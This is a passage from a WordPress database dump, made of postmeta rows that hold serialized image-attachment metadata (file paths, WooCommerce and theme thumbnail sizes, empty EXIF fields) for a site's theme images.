\";i:550;s:6:\"height\";i:470;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:26:\"landing-home-8-550x470.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:470;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:26:\"landing-home-8-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:26:\"landing-home-8-600x353.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:353;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:26:\"landing-home-8-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(110,1445,'_wp_attached_file','2018/01/full-width-img-3.jpg'),(111,1445,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1305;s:6:\"height\";i:867;s:4:\"file\";s:28:\"2018/01/full-width-img-3.jpg\";s:5:\"sizes\";a:16:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:28:\"full-width-img-3-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:28:\"full-width-img-3-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:28:\"full-width-img-3-600x399.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:399;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"full-width-img-3-300x199.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:199;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:29:\"full-width-img-3-1024x680.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:680;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"full-width-img-3-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:28:\"full-width-img-3-768x510.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:510;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:28:\"full-width-img-3-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:28:\"full-width-img-3-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:28:\"full-width-img-3-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:29:\"full-width-img-3-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:28:\"full-width-img-3-550x867.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:867;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:29:\"full-width-img-3-1100x867.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:867;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:28:\"full-width-img-3-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:28:\"full-width-img-3-600x399.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:399;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:28:\"full-width-img-3-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(112,1083,'_wp_attachment_image_alt','o'),(113,1084,'_wp_attached_file','2018/01/h2-slider1-graphic7.png'),(114,1084,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:165;s:6:\"height\";i:165;s:4:\"file\";s:31:\"2018/01/h2-slider1-graphic7.png\";s:5:\"sizes\";a:3:{s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:31:\"h2-slider1-graphic7-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"h2-slider1-graphic7-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:31:\"h2-slider1-graphic7-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(115,1084,'_wp_attachment_image_alt','o'),(116,1120,'_wp_attached_file','2018/01/product9-gallery1.jpg'),(117,1120,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:600;s:6:\"height\";i:600;s:4:\"file\";s:29:\"2018/01/product9-gallery1.jpg\";s:5:\"sizes\";a:11:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:29:\"product9-gallery1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:29:\"product9-gallery1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"product9-gallery1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"product9-gallery1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:29:\"product9-gallery1-600x300.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:29:\"product9-gallery1-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:29:\"product9-gallery1-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:29:\"product9-gallery1-600x550.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:29:\"product9-gallery1-550x600.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:29:\"product9-gallery1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:29:\"product9-gallery1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(118,73,'_wp_attachment_image_alt','o'),(119,83,'_wp_attached_file','2018/01/about-us-img-1.png'),(120,83,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1157;s:6:\"height\";i:671;s:4:\"file\";s:26:\"2018/01/about-us-img-1.png\";s:5:\"sizes\";a:16:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:26:\"about-us-img-1-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:26:\"about-us-img-1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:26:\"about-us-img-1-600x348.png\";s:5:\"width\";i:600;s:6:\"height\";i:348;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"about-us-img-1-300x174.png\";s:5:\"width\";i:300;s:6:\"height\";i:174;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:27:\"about-us-img-1-1024x594.png\";s:5:\"width\";i:1024;s:6:\"height\";i:594;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"about-us-img-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:26:\"about-us-img-1-768x445.png\";s:5:\"width\";i:768;s:6:\"height\";i:445;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:26:\"about-us-img-1-630x300.png\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:26:\"about-us-img-1-300x240.png\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:9:\"image/png\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:26:\"about-us-img-1-550x550.png\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:27:\"about-us-img-1-1100x550.png\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:9:\"image/png\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:26:\"about-us-img-1-550x671.png\";s:5:\"width\";i:550;s:6:\"height\";i:671;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:27:\"about-us-img-1-1100x671.png\";s:5:\"width\";i:1100;s:6:\"height\";i:671;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:26:\"about-us-img-1-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:26:\"about-us-img-1-600x348.png\";s:5:\"width\";i:600;s:6:\"height\";i:348;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:26:\"about-us-img-1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(121,2515,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:2560;s:6:\"height\";i:1723;s:4:\"file\";s:29:\"2018/02/pozadina-1-scaled.jpg\";s:5:\"sizes\";a:9:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:29:\"pozadina-1-scaled-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:29:\"pozadina-1-scaled-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:29:\"pozadina-1-scaled-600x404.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:404;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:22:\"pozadina-1-300x202.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:202;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:23:\"pozadina-1-1024x689.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:689;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:22:\"pozadina-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:22:\"pozadina-1-768x517.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:517;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:22:\"pozadina-1-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:22:\"pozadina-1-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(122,3969,'_wp_attachment_image_alt','s'),(123,3973,'_wp_attached_file','2018/03/landing-home-6.jpg'),(124,3973,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:800;s:6:\"height\";i:472;s:4:\"file\";s:26:\"2018/03/landing-home-6.jpg\";s:5:\"sizes\";a:13:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:26:\"landing-home-6-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:26:\"landing-home-6-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:26:\"landing-home-6-600x354.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:354;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"landing-home-6-300x177.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:177;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"landing-home-6-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:26:\"landing-home-6-768x453.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:453;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:26:\"landing-home-6-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:26:\"landing-home-6-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:26:\"landing-home-6-550x472.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:472;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:26:\"landing-home-6-550x472.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:472;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:26:\"landing-home-6-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:26:\"landing-home-6-600x354.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:354;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:26:\"landing-home-6-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(125,3973,'_wp_attachment_image_alt','a'),(126,1445,'_wp_attachment_image_alt','a'),(127,4029,'_wp_attached_file','2018/03/landing-what-we-do.jpg'),(128,4029,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:800;s:6:\"height\";i:472;s:4:\"file\";s:30:\"2018/03/landing-what-we-do.jpg\";s:5:\"sizes\";a:13:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:30:\"landing-what-we-do-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:30:\"landing-what-we-do-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:30:\"landing-what-we-do-600x354.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:354;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:30:\"landing-what-we-do-300x177.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:177;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:30:\"landing-what-we-do-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:30:\"landing-what-we-do-768x453.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:453;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:30:\"landing-what-we-do-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:30:\"landing-what-we-do-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:30:\"landing-what-we-do-550x472.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:472;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:30:\"landing-what-we-do-550x472.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:472;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:30:\"landing-what-we-do-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:30:\"landing-what-we-do-600x354.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:354;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:30:\"landing-what-we-do-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(129,1120,'_wp_attachment_image_alt','a'),(130,1456,'_wp_attached_file','2018/01/big-gallery-img-1.jpg'),(131,1456,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1305;s:6:\"height\";i:867;s:4:\"file\";s:29:\"2018/01/big-gallery-img-1.jpg\";s:5:\"sizes\";a:16:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:29:\"big-gallery-img-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:29:\"big-gallery-img-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:29:\"big-gallery-img-1-600x399.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:399;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"big-gallery-img-1-300x199.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:199;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:30:\"big-gallery-img-1-1024x680.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:680;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"big-gallery-img-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:29:\"big-gallery-img-1-768x510.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:510;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:29:\"big-gallery-img-1-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:29:\"big-gallery-img-1-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:29:\"big-gallery-img-1-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:30:\"big-gallery-img-1-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:29:\"big-gallery-img-1-550x867.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:867;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:30:\"big-gallery-img-1-1100x867.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:867;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:29:\"big-gallery-img-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:29:\"big-gallery-img-1-600x399.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:399;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:29:\"big-gallery-img-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(132,1121,'_wp_attached_file','2018/01/product9-gallery2.jpg'),(133,1121,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:600;s:6:\"height\";i:600;s:4:\"file\";s:29:\"2018/01/product9-gallery2.jpg\";s:5:\"sizes\";a:11:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:29:\"product9-gallery2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:29:\"product9-gallery2-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"product9-gallery2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"product9-gallery2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"f